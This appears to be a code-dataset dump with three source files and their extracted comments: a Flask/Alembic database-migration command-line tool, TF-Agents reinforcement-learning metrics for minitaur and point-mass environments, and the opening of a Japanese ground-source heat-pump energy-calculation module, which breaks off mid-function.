tag=None): """'stamp' the revision table with the given revision; don't run any migrations""" config = migrations.migrate.get_config(directory) command.stamp(config, revision, sql=sql, tag=tag)
<filename>flex/db/cli.py<gh_stars>0 import os import argparse from flex.core.cli import Manager, prompt_bool from .utils import app_get_db_client from flask import current_app from .migrations import Config, migrations from alembic import command console = Manager(usage="Perform SQL database migrations and operations with SQLAlchemy.") @console.command def createdb(binds=None): """Creates the configured database and tables from sqlalchemy models.""" binds = () if binds is None else binds.split(',') _dbclient().create_database(*binds) @console.command def dropdb(binds=None): """Drops the current sqlalchemy database.""" binds = () if binds is None else binds.split(',') if prompt_bool("Sure you want to drop the database?"): _dbclient().drop_database(*binds) # @console.command # def recreatedb(create_tables=True, drop_tables=False): # """Recreates the database and tables (same as issuing 'drop_db' and then 'create_db').""" # dropdb(drop_tables) # createdb(create_tables) # @console.command # def createtables(): # """Creates the configured database and tables from sqlalchemy models.""" # _dbclient().create_all() @console.command def droptables(): """Drops the current sqlalchemy database.""" if prompt_bool("Sure you want to drop all tables in the database?"): _dbclient().drop_all() # @console.command # def recreatetables(): # """Recreates database tables (same as issuing 'drop_tables' and then 'create_tables').""" # droptables() # createtables() def _dbclient(app=None): return app_get_db_client(app or current_app) @console.option('-d', '--directory', dest='directory', default=None, help="migration script directory (default is '.migrations')") @console.option('--multidb', dest='multidb', action='store_true', default=False, help="Multiple databases migraton (default is False)") def init(directory=None, multidb=False): """Creates a new migration repository""" createdb() if directory is None: directory = migrations.directory config = Config() config.set_main_option('script_location', directory) config.config_file_name = os.path.join(directory, 'alembic.ini') config = migrations.migrate.call_configure_callbacks(config) if multidb: command.init(config, directory, 'flex-multidb') else: command.init(config, directory, 'flex') @console.option('--rev-id', dest='rev_id', default=None, help=('Specify a hardcoded revision id instead of generating one')) @console.option('--version-path', dest='version_path', default=None, help=('Specify specific path from config for version file')) @console.option('--branch-label', dest='branch_label', default=None, help=('Specify a branch label to apply to the new revision')) @console.option('--splice', dest='splice', action='store_true', default=False, help=('Allow a non-head revision as the "head" to splice onto')) @console.option('--head', dest='head', default='head', help=('Specify head revision or <branchname>@head to base new revision on')) @console.option('--sql', dest='sql', action='store_true', default=False, help=("Don't emit SQL to database - dump to standard output instead")) @console.option('--autogenerate', dest='autogenerate', action='store_true', default=False, help=('Populate revision script with candidate migration operations, based on comparison of database to model')) @console.option('-m', '--message', dest='message', default=None, help='Revision message') @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def revision(directory=None, message=None, autogenerate=False, sql=False, head='head', splice=False, branch_label=None, version_path=None, rev_id=None): """Create a new revision file.""" config = migrations.migrate.get_config(directory) command.revision(config, message, autogenerate=autogenerate, sql=sql, head=head, splice=splice, branch_label=branch_label, version_path=version_path, rev_id=rev_id ) @console.option('--rev-id', dest='rev_id', default=None, help=('Specify a hardcoded revision id instead of generating one')) @console.option('--version-path', dest='version_path', default=None, help=('Specify specific path from config for version file')) @console.option('--branch-label', dest='branch_label', default=None, help=('Specify a branch label to apply to the new revision')) @console.option('--splice', dest='splice', action='store_true', default=False, help=('Allow a non-head revision as the "head" to splice onto')) @console.option('--head', dest='head', default='head', help=('Specify head revision or <branchname>@head to base new revision on')) @console.option('--sql', dest='sql', action='store_true', default=False, help=("Don't emit SQL to database - dump to standard output instead")) @console.option('-m', '--message', dest='message', default=None) @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def migrate(directory=None, message=None, sql=False, head='head', splice=False, branch_label=None, version_path=None, rev_id=None): """Alias for 'revision --autogenerate'""" config = migrations.migrate.get_config(directory, opts=['autogenerate']) command.revision(config, message, autogenerate=True, sql=sql, head=head, splice=splice, branch_label=branch_label, version_path=version_path, rev_id=rev_id ) @console.option('revision', nargs='?', default='head', help="revision identifier") @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def edit(directory=None, revision='current'): """Edit current revision.""" config = migrations.migrate.get_config(directory) command.edit(config, revision) @console.option('--rev-id', dest='rev_id', default=None, help=('Specify a hardcoded revision id instead of generating one')) @console.option('--branch-label', dest='branch_label', default=None, help=('Specify a branch label to apply to the new revision')) @console.option('-m', '--message', dest='message', default=None) @console.option('revisions', nargs='+', help='one or more revisions, or "heads" for all heads') @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def merge(directory=None, revisions='', message=None, branch_label=None, rev_id=None): """Merge two revisions together. Creates a new migration file""" config = migrations.migrate.get_config(directory) command.merge(config, revisions, message=message, branch_label=branch_label, rev_id=rev_id) @console.option('--tag', dest='tag', default=None, help=("Arbitrary 'tag' name - can be used by custom env.py scripts")) @console.option('--sql', dest='sql', action='store_true', default=False, help=("Don't emit SQL to database - dump to standard output instead")) @console.option('revision', nargs='?', default='head', help="revision identifier") @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) @console.option('-x', '--x-arg', dest='x_arg', default=None, action='append', help=("Additional arguments consumed by custom env.py scripts")) def upgrade(directory=None, revision='head', sql=False, tag=None, x_arg=None): """Upgrade to a later version""" config = migrations.migrate.get_config(directory, x_arg=x_arg) command.upgrade(config, revision, sql=sql, tag=tag) @console.option('--tag', dest='tag', default=None, help=("Arbitrary 'tag' name - can be used by custom env.py scripts")) @console.option('--sql', dest='sql', action='store_true', default=False, help=("Don't emit SQL to database - dump to standard output instead")) @console.option('revision', nargs='?', default="-1", help="revision identifier") @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) @console.option('-x', '--x-arg', dest='x_arg', default=None, action='append', help=("Additional arguments consumed by custom env.py scripts")) def downgrade(directory=None, revision='-1', sql=False, tag=None, x_arg=None): """Revert to a previous version""" config = migrations.migrate.get_config(directory, x_arg=x_arg) if sql and revision == '-1': revision = 'head:-1' command.downgrade(config, revision, sql=sql, tag=tag) @console.option('revision', nargs='?', default="head", help="revision identifier") @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def show(directory=None, revision='head'): """Show the revision denoted by the given symbol.""" config = migrations.migrate.get_config(directory) command.show(config, revision) @console.option('-v', '--verbose', dest='verbose', action='store_true', default=False, help='Use more verbose output') @console.option('-r', '--rev-range', dest='rev_range', default=None, help='Specify a revision range; format is [start]:[end]') @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def history(directory=None, rev_range=None, verbose=False): """List changeset scripts in chronological order.""" config = migrations.migrate.get_config(directory) command.history(config, rev_range, verbose=verbose) @console.option('--resolve-dependencies', dest='resolve_dependencies', action='store_true', default=False, help='Treat dependency versions as down revisions') @console.option('-v', '--verbose', dest='verbose', action='store_true', default=False, help='Use more verbose output') @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def heads(directory=None, verbose=False, resolve_dependencies=False): """Show current available heads in the script directory""" config = migrations.migrate.get_config(directory) command.heads(config, verbose=verbose, resolve_dependencies=resolve_dependencies) @console.option('-v', '--verbose', dest='verbose', action='store_true', default=False, help='Use more verbose output') @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def branches(directory=None, verbose=False): """Show current branch points""" config = migrations.migrate.get_config(directory) command.branches(config, verbose=verbose) @console.option('--head-only', dest='head_only', action='store_true', default=False, help='Deprecated. Use --verbose for additional output') @console.option('-v', '--verbose', dest='verbose', action='store_true', default=False, help='Use more verbose output') @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def current(directory=None, verbose=False, head_only=False): """Display the current revision for each database.""" config = migrations.migrate.get_config(directory) command.current(config, verbose=verbose, head_only=head_only) @console.option('--tag', dest='tag', default=None, help=("Arbitrary 'tag' name - can be used by custom env.py scripts")) @console.option('--sql', dest='sql', action='store_true', default=False, help=("Don't emit SQL to database - dump to standard output instead")) @console.option('revision', default=None, help="revision identifier") @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def stamp(directory=None, revision='head', sql=False, tag=None): """'stamp' the revision table with the given revision; don't run any migrations""" config = migrations.migrate.get_config(directory) command.stamp(config, revision, sql=sql, tag=tag)
en
0.602278
Creates the configured database and tables from sqlalchemy models. Drops the current sqlalchemy database. # @console.command # def recreatedb(create_tables=True, drop_tables=False): # """Recreates the database and tables (same as issuing 'drop_db' and then 'create_db').""" # dropdb(drop_tables) # createdb(create_tables) # @console.command # def createtables(): # """Creates the configured database and tables from sqlalchemy models.""" # _dbclient().create_all() Drops the current sqlalchemy database. # @console.command # def recreatetables(): # """Recreates database tables (same as issuing 'drop_tables' and then 'create_tables').""" # droptables() # createtables() Creates a new migration repository Create a new revision file. Alias for 'revision --autogenerate' Edit current revision. Merge two revisions together. Creates a new migration file Upgrade to a later version Revert to a previous version Show the revision denoted by the given symbol. List changeset scripts in chronological order. Show current available heads in the script directory Show current branch points Display the current revision for each database. 'stamp' the revision table with the given revision; don't run any migrations
2.641903
3
safemrl/utils/metrics.py
krishpop/google-research
0
6627904
<filename>safemrl/utils/metrics.py # coding=utf-8 # Copyright 2019 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """Custom TFAgent PyMetric for minitaur and point-mass environments. AverageEarlyFailureMetric used for detecting fall count for minitaur env, and AverageFallenMetric and AverageSuccessMetric used for poit-mass envs. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import gin import numpy as np from tf_agents.metrics import py_metrics from tf_agents.utils import numpy_storage @gin.configurable class AverageEarlyFailureMetric(py_metrics.StreamingMetric): """Computes average early failure rate in buffer_size episodes.""" def __init__(self, max_episode_len=500, name='AverageEarlyFailure', buffer_size=10, batch_size=None): """Creates an AverageEnvObsDict.""" self._np_state = numpy_storage.NumpyState() self._max_episode_len = max_episode_len # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._np_state.episode_steps = np.array(0, dtype=np.int32) super(AverageEarlyFailureMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): """Resets stat gathering variables.""" self._np_state.episode_steps = np.zeros(shape=(batch_size,), dtype=np.int32) def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ episode_steps = self._np_state.episode_steps is_last = np.where(trajectory.is_boundary()) not_last = np.where(~trajectory.is_boundary()) episode_steps[not_last] += 1 if len(is_last[0]) > 0: self.add_to_buffer(episode_steps[is_last] < self._max_episode_len) episode_steps[is_last] = 0 @gin.configurable class AverageFallenMetric(py_metrics.StreamingMetric): """Computes average fallen rate for PointMass envs in buffer_size episodes.""" def __init__(self, dtype=np.bool, name='AverageFallen', buffer_size=10, batch_size=None): """Creates an AverageFallenMetric.""" # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._dtype = dtype super(AverageFallenMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): return def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ is_last = np.where(trajectory.is_boundary()) if len(is_last[0]) > 0: self.add_to_buffer(trajectory.observation['fallen'][is_last]) @gin.configurable class AverageSuccessMetric(py_metrics.StreamingMetric): """Computes average success rate for PointMass env in buffer_size episodes.""" def __init__(self, name='AverageSuccess', buffer_size=10, batch_size=None): """Creates an AverageSuccessMetric.""" # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). super(AverageSuccessMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): return def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ is_last = np.where(trajectory.is_last()) if len(is_last[0]) > 0: succ = np.logical_and( np.logical_not(trajectory.observation['fallen'][is_last]), trajectory.reward[is_last] > 0.) self.add_to_buffer(succ) @gin.configurable class MinitaurAverageSpeedMetric(py_metrics.StreamingMetric): """Computes average early failure rate in buffer_size episodes.""" def __init__(self, name='MinitaurAverageSpeed', buffer_size=10, batch_size=None): """Creates a metric for minitaur speed stats.""" self._np_state = numpy_storage.NumpyState() # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._np_state.episode_steps = np.array(0, dtype=float) self._np_state.speed = np.array(0, dtype=float) super(MinitaurAverageSpeedMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): """Resets stat gathering variables.""" self._np_state.episode_steps = np.zeros(shape=(batch_size,), dtype=np.int32) self._np_state.speed = np.zeros(shape=(batch_size,), dtype=float) def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ episode_steps = self._np_state.episode_steps total_speed = self._np_state.speed is_last = np.where(trajectory.is_boundary()) not_last = np.where(~trajectory.is_boundary()) total_speed[not_last] += trajectory.observation['current_vel'][not_last] episode_steps[not_last] += 1 if len(is_last[0]) > 0: self.add_to_buffer(total_speed[is_last]/episode_steps[is_last]) episode_steps[is_last] = 0 total_speed[is_last] = 0 @gin.configurable class MinitaurAverageMaxSpeedMetric(py_metrics.StreamingMetric): """Computes average early failure rate in buffer_size episodes.""" def __init__(self, name='MinitaurAverageMaxSpeed', buffer_size=10, batch_size=None): """Creates a metric for minitaur speed stats.""" self._np_state = numpy_storage.NumpyState() # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._np_state.speed = np.array(0, dtype=float) super(MinitaurAverageMaxSpeedMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): """Resets stat gathering variables.""" self._np_state.speed = np.zeros(shape=(batch_size,), dtype=float) def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ max_speed = self._np_state.speed is_last = np.where(trajectory.is_boundary()) not_last = np.where(~trajectory.is_boundary()) if len(not_last[0]) > 0: max_speed[not_last] = np.max([trajectory.observation['current_vel'][not_last], max_speed[not_last]], axis=0) if len(is_last[0]) > 0: self.add_to_buffer(max_speed[is_last]) max_speed[is_last] = 0 @gin.configurable class CubeAverageScoreMetric(py_metrics.StreamingMetric): """Computes average score at end of trajectory""" def __init__(self, env, name='AverageScore', buffer_size=10, batch_size=None): """ Creates an CubeAverageScoreMetric. Args: env: Instance of gym.Env that implements get_score() which updates the metric name: metric name buffer_size: number of episodes to compute average over """ # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._env = env batch_size = batch_size or len(env) self._np_state = numpy_storage.NumpyState() self._np_state.adds_to_buff = np.array(0, dtype=float) # used so that buff is not over-populated by returned trajectories from short episodes super(CubeAverageScoreMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): return def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ is_last = np.where(trajectory.is_last()) if len(is_last[0]) > 0: for idx in is_last[0]: self.add_to_buffer([self._env[idx].last_score]) self._np_state.adds_to_buff[idx] += 1
<filename>safemrl/utils/metrics.py # coding=utf-8 # Copyright 2019 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """Custom TFAgent PyMetric for minitaur and point-mass environments. AverageEarlyFailureMetric used for detecting fall count for minitaur env, and AverageFallenMetric and AverageSuccessMetric used for poit-mass envs. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import gin import numpy as np from tf_agents.metrics import py_metrics from tf_agents.utils import numpy_storage @gin.configurable class AverageEarlyFailureMetric(py_metrics.StreamingMetric): """Computes average early failure rate in buffer_size episodes.""" def __init__(self, max_episode_len=500, name='AverageEarlyFailure', buffer_size=10, batch_size=None): """Creates an AverageEnvObsDict.""" self._np_state = numpy_storage.NumpyState() self._max_episode_len = max_episode_len # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._np_state.episode_steps = np.array(0, dtype=np.int32) super(AverageEarlyFailureMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): """Resets stat gathering variables.""" self._np_state.episode_steps = np.zeros(shape=(batch_size,), dtype=np.int32) def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ episode_steps = self._np_state.episode_steps is_last = np.where(trajectory.is_boundary()) not_last = np.where(~trajectory.is_boundary()) episode_steps[not_last] += 1 if len(is_last[0]) > 0: self.add_to_buffer(episode_steps[is_last] < self._max_episode_len) episode_steps[is_last] = 0 @gin.configurable class AverageFallenMetric(py_metrics.StreamingMetric): """Computes average fallen rate for PointMass envs in buffer_size episodes.""" def __init__(self, dtype=np.bool, name='AverageFallen', buffer_size=10, batch_size=None): """Creates an AverageFallenMetric.""" # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._dtype = dtype super(AverageFallenMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): return def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ is_last = np.where(trajectory.is_boundary()) if len(is_last[0]) > 0: self.add_to_buffer(trajectory.observation['fallen'][is_last]) @gin.configurable class AverageSuccessMetric(py_metrics.StreamingMetric): """Computes average success rate for PointMass env in buffer_size episodes.""" def __init__(self, name='AverageSuccess', buffer_size=10, batch_size=None): """Creates an AverageSuccessMetric.""" # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). super(AverageSuccessMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): return def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ is_last = np.where(trajectory.is_last()) if len(is_last[0]) > 0: succ = np.logical_and( np.logical_not(trajectory.observation['fallen'][is_last]), trajectory.reward[is_last] > 0.) self.add_to_buffer(succ) @gin.configurable class MinitaurAverageSpeedMetric(py_metrics.StreamingMetric): """Computes average early failure rate in buffer_size episodes.""" def __init__(self, name='MinitaurAverageSpeed', buffer_size=10, batch_size=None): """Creates a metric for minitaur speed stats.""" self._np_state = numpy_storage.NumpyState() # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._np_state.episode_steps = np.array(0, dtype=float) self._np_state.speed = np.array(0, dtype=float) super(MinitaurAverageSpeedMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): """Resets stat gathering variables.""" self._np_state.episode_steps = np.zeros(shape=(batch_size,), dtype=np.int32) self._np_state.speed = np.zeros(shape=(batch_size,), dtype=float) def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ episode_steps = self._np_state.episode_steps total_speed = self._np_state.speed is_last = np.where(trajectory.is_boundary()) not_last = np.where(~trajectory.is_boundary()) total_speed[not_last] += trajectory.observation['current_vel'][not_last] episode_steps[not_last] += 1 if len(is_last[0]) > 0: self.add_to_buffer(total_speed[is_last]/episode_steps[is_last]) episode_steps[is_last] = 0 total_speed[is_last] = 0 @gin.configurable class MinitaurAverageMaxSpeedMetric(py_metrics.StreamingMetric): """Computes average early failure rate in buffer_size episodes.""" def __init__(self, name='MinitaurAverageMaxSpeed', buffer_size=10, batch_size=None): """Creates a metric for minitaur speed stats.""" self._np_state = numpy_storage.NumpyState() # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._np_state.speed = np.array(0, dtype=float) super(MinitaurAverageMaxSpeedMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): """Resets stat gathering variables.""" self._np_state.speed = np.zeros(shape=(batch_size,), dtype=float) def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ max_speed = self._np_state.speed is_last = np.where(trajectory.is_boundary()) not_last = np.where(~trajectory.is_boundary()) if len(not_last[0]) > 0: max_speed[not_last] = np.max([trajectory.observation['current_vel'][not_last], max_speed[not_last]], axis=0) if len(is_last[0]) > 0: self.add_to_buffer(max_speed[is_last]) max_speed[is_last] = 0 @gin.configurable class CubeAverageScoreMetric(py_metrics.StreamingMetric): """Computes average score at end of trajectory""" def __init__(self, env, name='AverageScore', buffer_size=10, batch_size=None): """ Creates an CubeAverageScoreMetric. Args: env: Instance of gym.Env that implements get_score() which updates the metric name: metric name buffer_size: number of episodes to compute average over """ # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._env = env batch_size = batch_size or len(env) self._np_state = numpy_storage.NumpyState() self._np_state.adds_to_buff = np.array(0, dtype=float) # used so that buff is not over-populated by returned trajectories from short episodes super(CubeAverageScoreMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): return def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ is_last = np.where(trajectory.is_last()) if len(is_last[0]) > 0: for idx in is_last[0]: self.add_to_buffer([self._env[idx].last_score]) self._np_state.adds_to_buff[idx] += 1
en
0.753511
# coding=utf-8 # Copyright 2019 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 Custom TFAgent PyMetric for minitaur and point-mass environments. AverageEarlyFailureMetric used for detecting fall count for minitaur env, and AverageFallenMetric and AverageSuccessMetric used for poit-mass envs. Computes average early failure rate in buffer_size episodes. Creates an AverageEnvObsDict. # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). Resets stat gathering variables. Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. Computes average fallen rate for PointMass envs in buffer_size episodes. Creates an AverageFallenMetric. # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. Computes average success rate for PointMass env in buffer_size episodes. Creates an AverageSuccessMetric. # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. Computes average early failure rate in buffer_size episodes. Creates a metric for minitaur speed stats. # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). Resets stat gathering variables. Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. Computes average early failure rate in buffer_size episodes. Creates a metric for minitaur speed stats. # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). Resets stat gathering variables. Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. Computes average score at end of trajectory Creates an CubeAverageScoreMetric. Args: env: Instance of gym.Env that implements get_score() which updates the metric name: metric name buffer_size: number of episodes to compute average over # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). # used so that buff is not over-populated by returned trajectories from short episodes Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory.
1.961649
2
src/pyhees/section4_7_n.py
jjj-design/pyhees
0
6627905
<reponame>jjj-design/pyhees<filename>src/pyhees/section4_7_n.py # ============================================================================ # 付録 N 地中熱ヒートポンプ温水暖房機 # ============================================================================ import numpy as np from pyhees.section4_7_common import get_Q_out_H_hs_d_t from pyhees.section4_8_a import calc_e_ref_H_th import pyhees.section4_7_h as appendix_H # ============================================================================ # N3. 暖房エネルギー消費量 # ============================================================================ # ============================================================================ # N.3.1 消費電力量 # ============================================================================ def calc_E_E_hs_d_t(Q_dmd_H_hs_d_t, Theta_ex_a_Ave, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_SW_d_t, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType): """日付dの時刻tにおける1時間当たりの温水暖房用熱源機の消費電力量 (1) Args: Q_dmd_H_hs_d_t(ndarray): 1時間当たりの熱源機の熱需要 (MJ/h) Theta_ex_a_Ave(float): 年平均外気温度 (℃) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_SW_d_t(ndarray): 往き温水温度 (℃) q_max_hs(float): 熱源機の最大暖房能力 ⒲ L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) HeatExchangerType(str): 熱交換器タイプ (-) Returns: ndarray: 1時間当たりの熱源機の消費電力量 (kWh/h) """ # ---------- 地中熱交換器からの戻り熱源水の日平均温度 ---------- # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) L_max_C = get_L_max_C(L_CS_x_t_i, L_CL_x_t_i) # 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) L_max_H = get_L_max_H(L_H_x_t_i) # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) R_L_max = get_R_L_max(L_max_H, L_max_C) # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) K_gsRW_H = calc_K_gsRW_H(R_L_max, HeatExchangerType) # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Delta_Theta_gsRW_H = calc_Delta_Theta_gsRW_H(R_L_max, HeatExchangerType) # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)(17) Theta_gsRW_d_ave_d = get_Theta_gsRW_d_ave_d(K_gsRW_H, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, Delta_Theta_gsRW_H) # ---------- 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力 ---------- # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(16) q_max_H_hs_JRA = calc_q_max_H_hs_JRA(q_max_hs) # ---------- 温水暖房用熱源機内の平均放熱損失 ---------- # 日付dの時刻tにおける温水暖房用の熱源機内部の平均放熱損失 (kw) (N.9) q_loss_H_hs_d_t = get_q_loss_H_hs_d_t() # ---------- 温水暖房用熱源機の平均暖房出力 ---------- # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(15) Q_max_H_hs_d_t = calc_Q_max_H_hs_d_t(Theta_SW_d_t, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType) # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)(14) Q_out_H_hs_d_t = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t) # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) (13) q_out_H_hs_d_t = get_q_out_H_hs_d_t(Q_out_H_hs_d_t) # ---------- 温水暖房用熱源機の最大暖房能力に対する平均負荷率 ---------- # 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) qr_out_H_hs_d_t = get_qr_out_H_hs_d_t(q_out_H_hs_d_t, q_max_H_hs_JRA) # ---------- 補機の消費電力量 ---------- # 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) (11a) E_aux_hs_d_t = calc_E_aux_hs_d_t(qr_out_H_hs_d_t) # ---------- ポンプの消費電力量 ---------- # 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量 (kWh/h) (10a) E_pump_gsRW_d_t = calc_E_pump_gsRW_d_t(qr_out_H_hs_d_t) # 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量 (kWh/h) (9a) E_pump_SW_d_t = calc_E_pump_SW_d_t(qr_out_H_hs_d_t) # 日付dの時刻tにおける1時間当たりのポンプの消費電力量 (kWh/h) (8) E_pump_hs_d_t = get_E_pump_hs_d_t(E_pump_SW_d_t, E_pump_gsRW_d_t) # ---------- 圧縮機の消費電力量 ---------- # 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(7a) Theta_ref_SH_d_t = calc_Theta_ref_SH_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d) # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃)(6a) Theta_ref_SC_d_t = calc_Theta_ref_SC_d_t(qr_out_H_hs_d_t, Theta_SW_d_t) # 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(5a) Theta_ref_cnd_d_t = calc_Theta_ref_cnd_d_t(qr_out_H_hs_d_t, Theta_SW_d_t) # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃)(4a) 